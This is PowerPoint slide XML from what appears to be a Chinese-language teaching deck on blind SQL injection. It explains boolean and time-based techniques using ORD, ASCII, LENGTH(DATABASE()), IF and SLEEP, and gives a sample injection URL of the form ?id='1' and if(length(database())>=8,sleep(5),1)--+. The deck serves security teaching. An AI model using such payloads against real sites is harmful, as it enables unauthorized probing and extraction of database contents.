                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>转成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORD (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Select ASCII (‘a’);</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF67238-86AA-3982-855A-C20C6EA38900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103865" y="1021400"/>
            <a:ext cx="6100354" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>布尔盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2601485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2D0429-78F8-7BDE-CF14-191E32D79A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="11734" r="33838" b="29705"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="121921" y="343747"/>
            <a:ext cx="5730240" cy="3341987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC7DFEB2-A672-62E2-539B-CB1E2E9524B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="6128"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5388427" y="357815"/>
            <a:ext cx="6803573" cy="2817595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3EE2B33-54E1-39AC-4993-C848D4974E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="253219" y="3913797"/>
            <a:ext cx="10888394" cy="2826696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161068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CA7FC6-B742-80B2-0BA2-EF658EFDFF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="8468751" cy="4552749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF7DFF42-D150-128C-4481-1A8410F5B7FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="4583631"/>
            <a:ext cx="9879874" cy="2000049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269928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1E420DA-0795-271F-642B-A6606C51F529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2105840" y="1292353"/>
            <a:ext cx="9705160" cy="2994246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292D2397-23B1-91BB-2064-C0631975B744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052664" y="1840991"/>
            <a:ext cx="9811512" cy="48768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4656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04962"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时间盲注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p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873250" y="781685"/>
            <a:ext cx="9525000" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或benchmark()等函数让mysql执行时间变长，结合if判断，通过页面的响应时间来判断条件是否正确。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B63469E-8D5F-CED0-5ED5-DB577CD7E010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="2287457"/>
            <a:ext cx="6100354" cy="3788858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>截取长度</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="381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a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断，赋值</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="38100">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>( expression</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>val1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>val2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>睡眠</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>秒</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep (N);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pP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84625F-39D5-7DD7-FAFE-A442AD52CB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="1151581"/>
            <a:ext cx="8712181" cy="2243050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果数据库名字长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，则</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>秒，否则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>eg.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Select sleep(if((select length(database())=8),1,0));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等价于</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Select if((select length(database())=8), sleep (1),0);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1A1F334-AE6E-C68B-BE7A-A094CD35BFE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D6FFE1-7433-ACE0-5E47-2409EC81C848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8E6333A-17CF-CA87-8997-03F8A899756D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="2222083"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p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05DFB78F-3CE4-AFBB-4C8B-D7C460E826FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2031272" y="788869"/>
            <a:ext cx="6100354" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D7E7B9-FAAA-5DA7-65E6-35806B7C7253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1814410" y="3607061"/>
            <a:ext cx="9874885" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>举例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>判断当前数据库库名的长度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>如果数据库库名长度大于等于8，则mysql查询休眠5秒，否则查询1。语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if(length(database())&gt;=8,sleep(5),1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>:http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>XXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>.php?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>1' and if(length(database())&gt;=8,sleep(5),1)--+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19183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7909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攻击过程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357505" y="1368425"/>
            <a:ext cx="6769735" cy="3892861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
